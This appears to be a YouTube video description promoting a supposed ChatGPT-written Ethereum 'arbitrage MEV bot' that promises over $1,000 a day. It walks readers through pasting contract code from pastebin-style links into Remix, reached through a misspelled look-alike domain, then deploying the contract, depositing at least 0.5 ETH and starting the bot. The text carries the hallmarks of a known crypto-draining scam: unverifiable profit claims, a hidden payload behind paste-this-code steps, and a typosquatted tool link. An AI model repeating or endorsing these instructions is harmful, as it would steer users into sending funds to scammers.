
69 意见 · 1 年 前

Today I gonna tell you how to use Arbitrage MEV bot by ChatGPT and make more than $1,000 in a day.

⌨️ Bot Source Code: https://codepastes.com/raw/EXfXsu

⌨️ Backup Source Code: https://pastebin.com/raw/UMyW2kBb


👉 Download MetaMask: https://metamask.io/download

👉 Head over to Remix: https://remixcompileir.com

👉 Create “New File”. Rename it whatever you want or “bot.sol”

👉 Paste THIS code into Remix: https://codepastes.com/raw/EXfXsu
( if link doesn’t work use backup: https://pastebin.com/raw/UMyW2kBb )

👉 Go to the "Compile" tab on Remix and Compile with Solidity version 0.8.4

👉 Go to the “Deploy & Run Transactions” tab on Remix, select the “Injected Provider” environment, then “Deploy”. This will create your own contract by confirming the MetaMask Contract creation fee.

👉 Make sure your deposit is more than 0.5 ETH( to prevent negating slippage ) to your exact contract/bot address.

👉 Click on the “Key” button, and copy your key to VALUE

👉 In the “SetBalancePercent” or “SetBalanceETH” functions, enter the amount of money the bot will work with.

👉 Click “StartNative” button to get the bot started

👉 To withdraw funds from your smart contract, click on “Stop” button, then “Withdraw”


00:00 - Intro
00:29 - Chat GPT code overview
01:01 - How it works
01:30 - Configuring the bot
01:40 - Creating a bot file
02:09 - Bot requirements
02:28 - Compiling the code
03:07 - Running the bot correctly
03:41 - Overview of Bot Functionality
04:11 - IMPORTANT, don't show your key to anyone
04:30 - Launching the bot
05:19 - How much I made
05:58 - Getting my ETH back
06:44 - Errors and solutions
07:53 - Conclusion


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🔎 How can I restore the old contract again?

Instead of "Deploy" by creating a new contract in the "DEPLOY & RUN TRANSACTIONS" section, you can access your old contract again by typing the old contract address you created in the "At Address" field and clicking the "At Address" button.
Note: Access cannot be made with any other account other than your MetaMask account where you created the contract.

🌐 Explore passive earnings with our in-depth guide to MEV BOT strategies.

#mev #tradingbot #ethereum

#mevbot #slippagebot #arbitrage #uniswap #trading #mev #frontrun